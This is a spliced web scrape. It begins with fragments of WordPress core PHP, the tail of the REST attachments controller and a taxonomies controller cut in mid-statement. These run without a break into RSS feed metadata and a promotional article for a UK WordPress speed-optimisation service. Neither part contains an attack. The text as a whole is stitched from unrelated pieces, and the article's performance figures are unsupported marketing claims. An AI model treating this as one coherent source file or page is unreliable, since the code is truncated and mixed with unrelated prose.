) ); } if ( empty( $headers['content_type'] ) ) { return new WP_Error( 'rest_upload_no_content_type', __( 'No Content-Type supplied.' ), array( 'status' => 400 ) ); } if ( empty( $headers['content_disposition'] ) ) { return new WP_Error( 'rest_upload_no_content_disposition', __( 'No Content-Disposition supplied.' ), array( 'status' => 400 ) ); } $filename = self::get_filename_from_disposition( $headers['content_disposition'] ); if ( empty( $filename ) ) { return new WP_Error( 'rest_upload_invalid_disposition', __( 'Invalid Content-Disposition supplied. Content-Disposition needs to be formatted as `attachment; filename="image.png"` or similar.' ), array( 'status' => 400 ) ); } if ( ! empty( $headers['content_md5'] ) ) { $content_md5 = array_shift( $headers['content_md5'] ); $expected = trim( $content_md5 ); $actual = md5( $data ); if ( $expected !== $actual ) { return new WP_Error( 'rest_upload_hash_mismatch', __( 'Content hash did not match expected.' ), array( 'status' => 412 ) ); } } // Get the content-type. $type = array_shift( $headers['content_type'] ); // Include filesystem functions to get access to wp_tempnam() and wp_handle_sideload(). require_once ABSPATH . 'wp-admin/includes/file.php'; // Save the file. $tmpfname = wp_tempnam( $filename ); $fp = fopen( $tmpfname, 'w+' ); if ( ! $fp ) { return new WP_Error( 'rest_upload_file_error', __( 'Could not open file handle.' ), array( 'status' => 500 ) ); } fwrite( $fp, $data ); fclose( $fp ); // Now, sideload it in. $file_data = array( 'error' => null, 'tmp_name' => $tmpfname, 'name' => $filename, 'type' => $type, ); $size_check = self::check_upload_size( $file_data ); if ( is_wp_error( $size_check ) ) { return $size_check; } $overrides = array( 'test_form' => false, ); $sideloaded = wp_handle_sideload( $file_data, $overrides, $time ); if ( isset( $sideloaded['error'] ) ) { @unlink( $tmpfname ); return new WP_Error( 'rest_upload_sideload_error', $sideloaded['error'], array( 'status' => 500 ) ); } return $sideloaded; } /** * Parses filename from a Content-Disposition header value. * * As per RFC6266: * * content-disposition = "Content-Disposition" ":" * disposition-type *( ";" disposition-parm ) * * disposition-type = "inline" | "attachment" | disp-ext-type * ; case-insensitive * disp-ext-type = token * * disposition-parm = filename-parm | disp-ext-parm * * filename-parm = "filename" "=" value * | "filename*" "=" ext-value * * disp-ext-parm = token "=" value * | ext-token "=" ext-value * ext-token = * * @since 4.7.0 * * @link https://tools.ietf.org/html/rfc2388 * @link https://tools.ietf.org/html/rfc6266 * * @param string[] $disposition_header List of Content-Disposition header values. * @return string|null Filename if available, or null if not found. */ public static function get_filename_from_disposition( $disposition_header ) { // Get the filename. $filename = null; foreach ( $disposition_header as $value ) { $value = trim( $value ); if ( ! str_contains( $value, ';' ) ) { continue; } list( , $attr_parts ) = explode( ';', $value, 2 ); $attr_parts = explode( ';', $attr_parts ); $attributes = array(); foreach ( $attr_parts as $part ) { if ( ! str_contains( $part, '=' ) ) { continue; } list( $key, $value ) = explode( '=', $part, 2 ); $attributes[ trim( $key ) ] = trim( $value ); } if ( empty( $attributes['filename'] ) ) { continue; } $filename = trim( $attributes['filename'] ); // Unquote quoted filename, but after trimming. if ( str_starts_with( $filename, '"' ) && str_ends_with( $filename, '"' ) ) { $filename = substr( $filename, 1, -1 ); } } return $filename; } /** * Retrieves the query params for collections of attachments. * * @since 4.7.0 * @since 6.9.0 Extends the `media_type` and `mime_type` request arguments to support array values. * * @return array Query parameters for the attachment collection as an array. */ public function get_collection_params() { $params = parent::get_collection_params(); $params['status']['default'] = 'inherit'; $params['status']['items']['enum'] = array( 'inherit', 'private', 'trash' ); $media_types = array_keys( $this->get_media_types() ); $params['media_type'] = array( 'default' => null, 'description' => __( 'Limit result set to attachments of a particular media type or media types.' ), 'type' => 'array', 'items' => array( 'type' => 'string', 'enum' => $media_types, ), ); $params['mime_type'] = array( 'default' => null, 'description' => __( 'Limit result set to attachments of a particular MIME type or MIME types.' ), 'type' => 'array', 'items' => array( 'type' => 'string', ), ); return $params; } /** * Handles an upload via multipart/form-data ($_FILES). * * @since 4.7.0 * @since 6.6.0 Added the `$time` parameter. * * @param array $files Data from the `$_FILES` superglobal. * @param array $headers HTTP headers from the request. * @param string|null $time Optional. Time formatted in 'yyyy/mm'. Default null. * @return array|WP_Error Data from wp_handle_upload(). */ protected function upload_from_file( $files, $headers, $time = null ) { if ( empty( $files ) ) { return new WP_Error( 'rest_upload_no_data', __( 'No data supplied.' ), array( 'status' => 400 ) ); } // Verify hash, if given. if ( ! empty( $headers['content_md5'] ) ) { $content_md5 = array_shift( $headers['content_md5'] ); $expected = trim( $content_md5 ); $actual = md5_file( $files['file']['tmp_name'] ); if ( $expected !== $actual ) { return new WP_Error( 'rest_upload_hash_mismatch', __( 'Content hash did not match expected.' ), array( 'status' => 412 ) ); } } // Pass off to WP to handle the actual upload. $overrides = array( 'test_form' => false, ); // Bypasses is_uploaded_file() when running unit tests. if ( defined( 'DIR_TESTDATA' ) && DIR_TESTDATA ) { $overrides['action'] = 'wp_handle_mock_upload'; } $size_check = self::check_upload_size( $files['file'] ); if ( is_wp_error( $size_check ) ) { return $size_check; } // Include filesystem functions to get access to wp_handle_upload(). require_once ABSPATH . 'wp-admin/includes/file.php'; $file = wp_handle_upload( $files['file'], $overrides, $time ); if ( isset( $file['error'] ) ) { return new WP_Error( 'rest_upload_unknown_error', $file['error'], array( 'status' => 500 ) ); } return $file; } /** * Retrieves the supported media types. * * Media types are considered the MIME type category. * * @since 4.7.0 * * @return array Array of supported media types. */ protected function get_media_types() { $media_types = array(); foreach ( get_allowed_mime_types() as $mime_type ) { $parts = explode( '/', $mime_type ); if ( ! isset( $media_types[ $parts[0] ] ) ) { $media_types[ $parts[0] ] = array(); } $media_types[ $parts[0] ][] = $mime_type; } return $media_types; } /** * Determine if uploaded file exceeds space quota on multisite. * * Replicates check_upload_size(). * * @since 4.9.8 * * @param array $file $_FILES array for a given file. * @return true|WP_Error True if can upload, error for errors. */ protected function check_upload_size( $file ) { if ( ! is_multisite() ) { return true; } if ( get_site_option( 'upload_space_check_disabled' ) ) { return true; } $space_left = get_upload_space_available(); $file_size = filesize( $file['tmp_name'] ); if ( $space_left < $file_size ) { return new WP_Error( 'rest_upload_limited_space', /* translators: %s: Required disk space in kilobytes. */ sprintf( __( 'Not enough space to upload. %s KB needed.' ), number_format( ( $file_size - $space_left ) / KB_IN_BYTES ) ), array( 'status' => 400 ) ); } if ( $file_size > ( KB_IN_BYTES * get_site_option( 'fileupload_maxk', 1500 ) ) ) { return new WP_Error( 'rest_upload_file_too_big', /* translators: %s: Maximum allowed file size in kilobytes. */ sprintf( __( 'This file is too big. Files must be less than %s KB in size.' ), get_site_option( 'fileupload_maxk', 1500 ) ), array( 'status' => 400 ) ); } // Include multisite admin functions to get access to upload_is_user_over_quota(). require_once ABSPATH . 'wp-admin/includes/ms.php'; if ( upload_is_user_over_quota( false ) ) { return new WP_Error( 'rest_upload_user_quota_exceeded', __( 'You have used your space quota. Please delete files before uploading.' ), array( 'status' => 400 ) ); } return true; } /** * Gets the request args for the edit item route. * * @since 5.5.0 * @since 6.9.0 Adds flips capability and editable fields for the newly-created attachment post. * * @return array */ protected function get_edit_media_item_args() { $args = array( 'src' => array( 'description' => __( 'URL to the edited image file.' ), 'type' => 'string', 'format' => 'uri', 'required' => true, ), // The `modifiers` param takes precedence over the older format. 'modifiers' => array( 'description' => __( 'Array of image edits.' ), 'type' => 'array', 'minItems' => 1, 'items' => array( 'description' => __( 'Image edit.' ), 'type' => 'object', 'required' => array( 'type', 'args', ), 'oneOf' => array( array( 'title' => __( 'Flip' ), 'properties' => array( 'type' => array( 'description' => __( 'Flip type.' ), 'type' => 'string', 'enum' => array( 'flip' ), ), 'args' => array( 'description' => __( 'Flip arguments.' ), 'type' => 'object', 'required' => array( 'flip', ), 'properties' => array( 'flip' => array( 'description' => __( 'Flip direction.' ), 'type' => 'object', 'required' => array( 'horizontal', 'vertical', ), 'properties' => array( 'horizontal' => array( 'description' => __( 'Whether to flip in the horizontal direction.' ), 'type' => 'boolean', ), 'vertical' => array( 'description' => __( 'Whether to flip in the vertical direction.' ), 'type' => 'boolean', ), ), ), ), ), ), ), array( 'title' => __( 'Rotation' ), 'properties' => array( 'type' => array( 'description' => __( 'Rotation type.' ), 'type' => 'string', 'enum' => array( 'rotate' ), ), 'args' => array( 'description' => __( 'Rotation arguments.' ), 'type' => 'object', 'required' => array( 'angle', ), 'properties' => array( 'angle' => array( 'description' => __( 'Angle to rotate clockwise in degrees.' ), 'type' => 'number', ), ), ), ), ), array( 'title' => __( 'Crop' ), 'properties' => array( 'type' => array( 'description' => __( 'Crop type.' ), 'type' => 'string', 'enum' => array( 'crop' ), ), 'args' => array( 'description' => __( 'Crop arguments.' ), 'type' => 'object', 'required' => array( 'left', 'top', 'width', 'height', ), 'properties' => array( 'left' => array( 'description' => __( 'Horizontal position from the left to begin the crop as a percentage of the image width.' ), 'type' => 'number', ), 'top' => array( 'description' => __( 'Vertical position from the top to begin the crop as a percentage of the image height.' ), 'type' => 'number', ), 'width' => array( 'description' => __( 'Width of the crop as a percentage of the image width.' ), 'type' => 'number', ), 'height' => array( 'description' => __( 'Height of the crop as a percentage of the image height.' ), 'type' => 'number', ), ), ), ), ), ), ), ), 'rotation' => array( 'description' => __( 'The amount to rotate the image clockwise in degrees. DEPRECATED: Use `modifiers` instead.' ), 'type' => 'integer', 'minimum' => 0, 'exclusiveMinimum' => true, 'maximum' => 360, 'exclusiveMaximum' => true, ), 'x' => array( 'description' => __( 'As a percentage of the image, the x position to start the crop from. DEPRECATED: Use `modifiers` instead.' ), 'type' => 'number', 'minimum' => 0, 'maximum' => 100, ), 'y' => array( 'description' => __( 'As a percentage of the image, the y position to start the crop from. DEPRECATED: Use `modifiers` instead.' ), 'type' => 'number', 'minimum' => 0, 'maximum' => 100, ), 'width' => array( 'description' => __( 'As a percentage of the image, the width to crop the image to. DEPRECATED: Use `modifiers` instead.' ), 'type' => 'number', 'minimum' => 0, 'maximum' => 100, ), 'height' => array( 'description' => __( 'As a percentage of the image, the height to crop the image to. DEPRECATED: Use `modifiers` instead.' ), 'type' => 'number', 'minimum' => 0, 'maximum' => 100, ), ); /* * Get the args based on the post schema. This calls `rest_get_endpoint_args_for_schema()`, * which also takes care of sanitization and validation. */ $update_item_args = $this->get_endpoint_args_for_item_schema( WP_REST_Server::EDITABLE ); if ( isset( $update_item_args['caption'] ) ) { $args['caption'] = $update_item_args['caption']; } if ( isset( $update_item_args['description'] ) ) { $args['description'] = $update_item_args['description']; } if ( isset( $update_item_args['title'] ) ) { $args['title'] = $update_item_args['title']; } if ( isset( $update_item_args['post'] ) ) { $args['post'] = $update_item_args['post']; } if ( isset( $update_item_args['alt_text'] ) ) { $args['alt_text'] = $update_item_args['alt_text']; } return $args; } } namespace = 'wp/v2'; $this->rest_base = 'taxonomies'; } /** * Registers the routes for taxonomies. * * @since 4.7.0 * * @see register_rest_route() */ public function register_routes() { register_rest_route( $this->namespace, '/' . $this->rest_base, array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => array( $this, 'get_items' ), 'permission_callback' => array( $this, 'get_items_permissions_check' ), 'args' => $this->get_collection_params(), ), 'schema' => array( $this, 'get_public_item_schema' ), ) ); register_rest_route( $this->namespace, '/' . $this->rest_base . '/(?P[\w-]+)', array( 'args' => array( 'taxonomy' => array( 'description' => __( 'An alphanumeric identifier for the taxonomy.' ), 'type' => 'string', ), ), array( 'methods' => WP_REST_Server::READABLE, 'callback' => array( $this, 'get_item' ), 'permission_callback' => array( $this, 'get_item_permissions_check' ), 'args' => array( 'context' => $this->get_context_param( array( 'default' => 'view' ) ), ), ), 'schema' => array( $this, 'get_public_item_schema' ), ) ); } /** * Checks whether a given request has permission to read taxonomies. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return true|WP_Error True if the request has read access, WP_Error object otherwise. */ public function get_items_permissions_check( $request ) { if ( 'edit' === $request['context'] ) { if ( ! empty( $request['type'] ) ) { $taxonomies = get_object_taxonomies( $request['type'], 'objects' ); } else { $taxonomies = get_taxonomies( '', 'objects' ); } foreach ( $taxonomies as $taxonomy ) { if ( ! empty( $taxonomy->show_in_rest ) && current_user_can( $taxonomy->cap->assign_terms ) ) { return true; } } return new WP_Error( 'rest_cannot_view', __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ), array( 'status' => rest_authorization_required_code() ) ); } return true; } /** * Retrieves all public taxonomies. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response Response object on success, or WP_Error object on failure. */ public function get_items( $request ) { if ( $request->is_method( 'HEAD' ) ) { // Return early as this handler doesn't add any response headers. return new WP_REST_Response( array() ); } // Retrieve the list of registered collection query parameters. $registered = $this->get_collection_params(); if ( isset( $registered['type'] ) && ! empty( $request['type'] ) ) { $taxonomies = get_object_taxonomies( $request['type'], 'objects' ); } else { $taxonomies = get_taxonomies( '', 'objects' ); } $data = array(); foreach ( $taxonomies as $tax_type => $value ) { if ( empty( $value->show_in_rest ) || ( 'edit' === $request['context'] && ! current_user_can( $value->cap->assign_terms ) ) ) { continue; } $tax = $this->prepare_item_for_response( $value, $request ); $tax = $this->prepare_response_for_collection( $tax ); $data[ $tax_type ] = $tax; } if ( empty( $data ) ) { // Response should still be returned as a JSON object when it is empty. $data = (object) $data; } return rest_ensure_response( $data ); } /** * Checks if a given request has access to a taxonomy. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return bool|WP_Error True if the request has read access for the item, otherwise false or WP_Error object. */ public function get_item_permissions_check( $request ) { $tax_obj = get_taxonomy( $request['taxonomy'] ); if ( $tax_obj ) { if ( empty( $tax_obj->show_in_rest ) ) { return false; } if ( 'edit' === $request['context'] && ! current_user_can( $tax_obj->cap->assign_terms ) ) { return new WP_Error( 'rest_forbidden_context', __( 'Sorry, you are not allowed to manage terms in this taxonomy.' ), array( 'status' => rest_authorization_required_code() ) ); } } return true; } /** * Retrieves a specific taxonomy. * * @since 4.7.0 * * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure. */ public function get_item( $request ) { $tax_obj = get_taxonomy( $request['taxonomy'] ); if ( empty( $tax_obj ) ) { return new WP_Error( 'rest_taxonomy_invalid', __( 'Invalid taxonomy.' ), array( 'status' => 404 ) ); } $data = $this->prepare_item_for_response( $tax_obj, $request ); return rest_ensure_response( $data ); } /** * Prepares a taxonomy object for serialization. * * @since 4.7.0 * @since 5.9.0 Renamed `$taxonomy` to `$item` to match parent class for PHP 8 named parameter support. * * @param WP_Taxonomy $item Taxonomy data. * @param WP_REST_Request $request Full details about the request. * @return WP_REST_Response Response object. */ public function prepare_item_for_response( $item, $request ) { // Restores the more descriptive, specific name for use within this method. $taxonomy = $item; // Don't prepare the response body for HEAD requests. if ( $request->is_method( 'HEAD' ) ) { /** This filter is documented in wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php */ return apply_filters( 'rest_prepare_taxonomy', new WP_REST_Response( array() ), $taxonomy, $request ); } $base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name; $fields = $this->get_fields_for_response( $request ); $data = array(); if ( in_array( 'name', $fields, true ) ) { $data['name'] = $taxonomy->label; } if ( in_array( 'slug', $fields, true ) ) { $data['slug'] = $taxonomy->name; } if ( in_array( 'capabilities', $fields, true ) ) { $data['capabilities'] = $taxonomy->cap; } if ( in_array( 'description', $fields, true ) ) { $data['description'] = $taxonomy->description; } if ( in_array( 'labels', $fields, true ) ) { $data['labels'] = $taxonomy->labels; } if ( in_array( 'types', $fields, true ) ) { $data['types'] = array_values( $taxonomy->object_type ); } if ( in_array( 'show_cloud', $fields, true ) ) { $data['show_cloud'] = $taxonomy->show_tagcloud; } if ( in_array( 'hierarchical', $fields, true ) ) { $data['hierarchical'] = $taxonomy->hierarchical; } if ( in_array( 'rest_base', $fields, true ) ) { $data['rest_base'] = $base; } if ( in_array( 'rest_namespace', $fields, true ) ) { $data['rest_namespace'] = $taxonomy->rest_namespace; } if ( in_array( 'visibility', $fields, true ) ) { $data['visibility'] = array( 'public' => (bool) $taxonomy->public, 'publicly_queryable' => (bool) $taxonomy->publicly_queryable, 'show_admin_column' => (bool) $taxonomy->show_admin_column, 'show_in_nav_menus' => (bool) $taxonomy->show_in_nav_menus, 'show_in_quick_edit' => (bool) $taxonomy->show_in_quick_edit, 'show_ui' => (bool) $taxonomy->show_ui, ); } $context = ! empty( $request['context'] ) ? $request['context'] : 'view'; $data = $this->add_additional_fields_to_object( $data, $request ); $data = $this->filter_response_by_context( $data, $context ); // Wrap the data in a response object. $response = rest_ensure_response( $data ); if ( rest_is_field_included( '_links', $fields ) || rest_is_field_included( '_embedded', $fields ) ) { $response->add_links( $this->prepare_links( $taxonomy ) ); } /** * Filters a taxonomy returned from the REST API. * * Allows modification of the taxonomy data right before it is returned. * * @since 4.7.0 * * @param WP_REST_Response $response The response object. * @param WP_Taxonomy $item The original taxonomy object. * @param WP_REST_Request $request Request used to generate the response. */ return apply_filters( 'rest_prepare_taxonomy', $response, $taxonomy, $request ); } /** * Prepares links for the request. * * @since 6.1.0 * * @param WP_Taxonomy $taxonomy The taxonomy. * @return array Links for the given taxonomy. */ protected function prepare_links( $taxonomy ) { return array( 'collection' => array( 'href' => rest_url( sprintf( '%s/%s', $this->namespace, $this->rest_base ) ), ), 'https://api.w.org/items' => array( 'href' => rest_url( rest_get_route_for_taxonomy_items( $taxonomy->name ) ), ), ); } /** * Retrieves the taxonomy's schema, conforming to JSON Schema. * * @since 4.7.0 * @since 5.0.0 The `visibility` property was added. * @since 5.9.0 The `rest_namespace` property was added. * * @return array Item schema data. */ public function get_item_schema() { if ( $this->schema ) { return $this->add_additional_fields_schema( $this->schema ); } $schema = array( '$schema' => 'http://json-schema.org/draft-04/schema#', 'title' => 'taxonomy', 'type' => 'object', 'properties' => array( 'capabilities' => array( 'description' => __( 'All capabilities used by the taxonomy.' ), 'type' => 'object', 'context' => array( 'edit' ), 'readonly' => true, ), 'description' => array( 'description' => __( 'A human-readable description of the taxonomy.' ), 'type' => 'string', 'context' => array( 'view', 'edit' ), 'readonly' => true, ), 'hierarchical' => array( 'description' => __( 'Whether or not the taxonomy should have children.' ), 'type' => 'boolean', 'context' => array( 'view', 'edit' ), 'readonly' => true, ), 'labels' => array( 'description' => __( 'Human-readable labels for the taxonomy for various contexts.' ), 'type' => 'object', 'context' => array( 'edit' ), 'readonly' => true, ), 'name' => array( 'description' => __( 'The title for the taxonomy.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ), 'slug' => array( 'description' => __( 'An alphanumeric identifier for the taxonomy.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ), 'show_cloud' => array( 'description' => __( 'Whether or not the term cloud should be displayed.' ), 'type' => 'boolean', 'context' => array( 'edit' ), 'readonly' => true, ), 'types' => array( 'description' => __( 'Types associated with the taxonomy.' ), 'type' => 'array', 'items' => array( 'type' => 'string', ), 'context' => array( 'view', 'edit' ), 'readonly' => true, ), 'rest_base' => array( 'description' => __( 'REST base route for the taxonomy.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ), 'rest_namespace' => array( 'description' => __( 'REST namespace route for the taxonomy.' ), 'type' => 'string', 'context' => array( 'view', 'edit', 'embed' ), 'readonly' => true, ), 'visibility' => array( 'description' => __( 'The visibility settings for the taxonomy.' ), 'type' => 'object', 'context' => array( 'edit' ), 'readonly' => true, 'properties' => array( 'public' => array( 'description' => __( 'Whether a taxonomy is intended for use publicly either via the admin interface or by front-end users.' ), 'type' => 'boolean', ), 'publicly_queryable' => array( 'description' => __( 'Whether the taxonomy is publicly queryable.' ), 'type' => 'boolean', ), 'show_ui' => array( 'description' => __( 'Whether to generate a default UI for managing this taxonomy.' ), 'type' => 'boolean', ), 'show_admin_column' => array( 'description' => __( 'Whether to allow automatic creation of taxonomy columns on associated post-types table.' ), 'type' => 'boolean', ), 'show_in_nav_menus' => array( 'description' => __( 'Whether to make the taxonomy available for selection in navigation menus.' ), 'type' => 'boolean', ), 'show_in_quick_edit' => array( 'description' => __( 'Whether to show the taxonomy in the quick/bulk edit panel.' ), 'type' => 'boolean', ), ), ), ), ); $this->schema = $schema; return $this->add_additional_fields_schema( $this->schema ); } /** * Retrieves the query params for collections. * * @since 4.7.0 * * @return array Collection parameters. */ public function get_collection_params() { $new_params = array(); $new_params['context'] = $this->get_context_param( array( 'default' => 'view' ) ); $new_params['type'] = array( 'description' => __( 'Limit results to taxonomies associated with a specific post type.' ), 'type' => 'string', ); return $new_params; } } WordPress performance optimization – WordPress Care Point https://wpcarepoint.co.uk WordPress Website Solution Point Mon, 16 Mar 2026 17:54:51 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.4 https://wpcarepoint.co.uk/wp-content/uploads/2025/08/cropped-Untitled-10-32x32.png WordPress performance optimization – WordPress Care Point https://wpcarepoint.co.uk 32 32 Fix Your Slow WordPress Website Fast with WordPress Website Speed Optimization Service UK https://wpcarepoint.co.uk/blog/wp-website-speed-optimization-service-uk/ https://wpcarepoint.co.uk/blog/wp-website-speed-optimization-service-uk/#respond Sun, 08 Mar 2026 20:23:33 +0000 https://wpcarepoint.co.uk/?p=25983

A slow website hurts user experience, leads to a higher bounce rate of visitors leaving before they see what you offer, and ultimately impacts your place on Google’s algorithm. If your website is in London and takes longer than 3 seconds to load, you will already be losing out on traffic, rankings, and revenue.

At WP Care Point, we provide a professional WordPress Website Speed Optimization Service UK designed to fix slow WordPress websites, improve Core Web Vitals, and deliver measurable performance gains for UK businesses.

This guide explains why speed matters, what slows down WordPress sites, and how professional optimisation delivers real ROI.

Optimize WordPress Websites for Faster Loading Times

Don't Lose Customers Because of a Slow Website.

REQUEST A FREE WEBSITE SPEED ANALYSIS

Reasons to Consider the Speed of Your Website

Based on various studies conducted by leading market research experts, visitors to slow-load websites are more likely to leave the site (bounce) and become frustrated. In addition, search engines like Google will take into account your site’s speed and the performance of your Core Web Vitals metrics when ranking websites.

Fast-loading websites have higher rankings, customers enjoy a better user experience and higher engagement levels therefore generate more revenue.

Engage one of our professional WordPress developers today to optimize the speed of your site, which will improve your overall user experience, improve your Google Core Web Vitals metric and achieve a higher search engine ranking.

Get a free website Audit

Introducing our WordPress speed optimization service,
providing your website with a faster load time

Are you looking for someone to take care of the speed optimization
on your WordPress site?

Our WordPress optimization services for your site speed are proven by our expert team of WordPress developers.

One of the greatest advantages of using WordPress is the ability to add the features that are necessary for your website quickly; unfortunately, adding all of the plugins or tools required for those features could significantly lower the load speed and/or performance of your website.

For instance, we often see issues such as:

╰┈➤ Too Many Marketing Tracking Scripts

╰┈➤ Multiple Plugins for the Same Function

╰┈➤ Large Images

╰┈➤ Poor-Quality Hosting

These issues negatively impact your speed score. Most of the aforementioned problems can be fixed relatively quickly on small/medium-sized websites. Speed optimization for larger/more complex sites may require more time due to the complexity of testing, the number of advanced caching rules, and the setup for the scripts to run promptly.

We can improve your website speed (regardless of your site’s size or complexity).

Fix Slow WordPress Website Speed Optimization Service UK
Get a free website Audit

Avoid having a slow page speed, as it can stop your business from expanding.

Why Website Speed Matters for WordPress Sites in the UK

Website speed is no longer optional. It directly impacts:

1. Google Rankings

Updates to Google Page Experience algorithm have created a new metric, Core Web Vitals, that evaluate performance based upon three key performance indicators:

✦ Largest Contentful Paint (LCP);

✦ First Input Delay (FID)/Interaction to Next Paint (INP);

✦ Cumulative Layout Shift (CLS).

When your site has low scores for Core Web Vitals performance metrics, it is more difficult to climb the search rankings regardless of how well-written or relevant your content may be.

2. Conversion Rate

Research has shown that just one second of delay may greatly reduce conversion rate. As such, service providers and WooCommerce stores will lose out on potential sales or external avenues (through requests for services) due to their delay.

3. User Experience & Bounce Rate

Modern users expect pages to load almost instantly. If your site feels sluggish, they leave often before it finishes loading.

4. Local Competition

Due to the highly competitive nature of London’s digital market, speed has been identified as a unique selling point. In 2018, faster websites typically had better organic and paid traffic results than their slower competitors.

Signs Your WordPress Website Is Too Slow

Many business owners don’t realise their site is underperforming. Here are common indicators:

  • Page load time above 3 seconds

  • Poor score in Google PageSpeed Insights

  • Low Core Web Vitals performance

  • High bounce rate in GA4

  • Slow WooCommerce checkout process

  • High server response time (TTFB)

If you’re experiencing problems like this, you require a qualified optimisation specialist to assist you.

What Causes a Slow WordPress Website?

WordPress is flexible, but poor configuration creates performance bottlenecks. Below are the most common causes.

Poor Hosting Infrastructure

Cheap shared hosting often results in:

  • High Time To First Byte (TTFB)
  • CPU throttling
  • Overloaded servers
  • Slow database queries

No amount of plugins can fully compensate for weak hosting.

Images and Media Files Not Optimized

The slowest-loading websites generate the most problems through very large uncompressed images.

Common problems include:

  • There are no WebP or AVIF file types available
  • There is no lazy loading applied
  • Hero images are too large
  • There is too much video content in background videos.

Too Many Plugins

More plugins mean:

  • More CSS & JavaScript
  • Increased database queries
  • Potential conflicts
  • Backend slowdown

Often, 30–40% of installed plugins are unnecessary.

Render Blocking CSS & Java Script

Heavy themes and page builders frequently load:

  • Unused CSS
  • Blocking JavaScript
  • Multiple font files
  • Third-party tracking scripts

These delays first render and harm LCP scores.

No Caching or CDN Setup

Without caching:

  • Every page loads dynamically
  • Server processes repeat queries
  • Performance drops under traffic spikes

Without a CDN:

  • UK users may load files from distant servers
  • Increased latency

Database Bloat

Over time, WordPress databases accumulate:

  • Post revisions
  • Spam comments
  • Transients
  • Orphaned metadata

This increases query time and slows backend performance.

Our WordPress Website Speed Optimization Service UK

At WP Care Point (London, UK), we follow a structured performance engineering process not just plugin installation.

Complete Speed Audit

We conduct:

  • Core Web Vitals analysis
  • Server performance assessment
  • GTmetrix & Lighthouse diagnostics
  • Plugin conflict review
  • Database performance checker

You receive a detailed performance report before work begins.

Advanced Performance Optimization

We implement technical improvements including:

Image Optimization
  • WebP / AVIF conversion
  • Adaptive sizing
  • Lazy loading configuration
Code Optimization
  • CSS & JS minification
  • Defer & async JavaScript
  • Critical CSS generation
  • Removal of unused assets
Database Optimization
  • Cleanup & indexing
  • Query optimization
  • Transient management
Caching Configuration
  • Page caching
  • Browser caching
  • Object caching (if supported)

Hosting & Server Optimization

Where applicable, we optimize:

  • PHP version upgrade
  • Memory limit configuration
  • GZIP / Brotli compression
  • HTTP/2 or HTTP/3 activation
  • Server response time reduction

If hosting is limiting performance, we provide structured migration recommendations.

WooCommerce Speed Optimization

E-commerce sites require special handling:

  • Cart fragment optimization
  • Checkout performance tuning
  • Product page load reduction
  • Query optimisation
  • AJAX optimisation

This ensures faster transactions and improved sales performance.

CDN Integration

We configure:

  • Global CDN
  • Static asset delivery
  • DNS optimization
  • Security & firewall rules

For UK businesses, we ensure optimal performance for London-based users while maintaining global reach.

WordPress Core Web Vitals Optimization Explained

Largest Contentful Paint (LCP)

We improve LCP by:

  • Optimizing hero images
  • Reducing server response time
  • Preloading critical assets
  • Removing blocking scripts

Target: Under 2.5 seconds.

Interaction to Next Paint (INP)

We reduce interaction delay by:

  • Minimizing JavaScript execution
  • Removing heavy third-party scripts
  • Deferring non-critical JS

Cumulative Layout Shift (CLS)

We fix layout instability by:

  • Setting explicit image dimensions
  • Reserving space for ads or embeds
  • Optimizing font loading

Target: CLS below 0.1.

WordPress Speed Optimization for London Businesses

Local SEO and speed go hand in hand.

For London-based businesses:

  • Faster load time improves local pack performance
  • Lower bounce rate increases engagement
  • Better mobile performance boosts conversions

Our service supports small businesses across London and the surrounding areas, delivering measurable performance gains.

Before & After Performance Results

Typical improvements we achieve:

  • Load time reduced from 5.2s → 1.8s
  • PageSpeed score increased from 48 → 92
  • LCP reduced by 60%
  • Bounce rate improved by 25%
  • Conversion rate uplift of 10–30%

Every site differs, but structured optimization consistently produces measurable improvements.

DIY vs Professional WordPress Speed Optimization Service

Many businesses try DIY optimisation. Here is the difference:

DIY Plugin Approach

Professional Service

Basic caching

Full performance engineering

Limited Core Web Vitals fix

Advanced CWV optimisation

Risk of plugin conflicts

Safe staging implementation

Generic settings

Custom server-level tuning

No strategic oversight

SEO + performance integration

DIY solutions often provide superficial improvements but fail to address underlying bottlenecks.

How Much Does WordPress Speed Optimization Cost in the UK?

Fix Slow WordPress Website Speed Optimization Service UK

Pricing depends on:

  • Website size
  • Hosting environment
  • WooCommerce complexity
  • Existing technical issues
  • Core Web Vitals condition

Most UK speed optimization services range from one-time optimization packages to ongoing performance management plans.

The real question is ROI:

If faster load time increases conversions by even 10%, the investment typically pays for itself quickly.

Long Term Benefits of Professional Speed Optimization

  1. Higher Google rankings

  2. Improved user experience

  3. Increased conversion rates

  4. Lower bounce rate

  5. Better paid ad performance

  6. Reduced server strain

  7. Improved scalability

Speed optimization is not a cosmetic improvement, it is a growth investment.

Why Choose WP Care Point for WordPress Speed Optimization?

Businesses across the UK choose WP Care Point because:

★ We specialize in WordPress performance

★ We combine technical SEO with speed optimization

★ We provide transparent performance reporting

★ We use structured, test-driven optimization

★ We are UK-based and understand the local market

We do not rely on one-click fixes. We apply systematic performance engineering to ensure sustainable results.

Fix Your Slow WordPress Website Today

If your WordPress site is underperforming, losing rankings, or frustrating users, professional optimization is the solution.

Our WordPress Website Speed Optimization Service UK is designed to:

★ Improve Core Web Vitals

★ Reduce load time

★ Increase conversions

★ Strengthen SEO performance

A faster website means better rankings, more enquiries, and higher revenue.

Contact WP Care Point (London, UK) today and turn your slow WordPress website into a high-performance asset.

Revolutionize Your Website Today

Get a free Quote

"WordPress SPEED OPTIMIZATION"
Service for WordPress

Available on the CMS #1 web’s

It would be awesome if all kinds of speed problems could be solved by one product! If you have a hard time finding a solution to a speed issue, you can find one with WP Care Point, which is a hassle-free solution to your most challenging speed problems.

WordPress®
WooCommerce®

Tried everything and still slow?
Let WP Care Point have at it.

Google’s Core Web Vitals must be passed

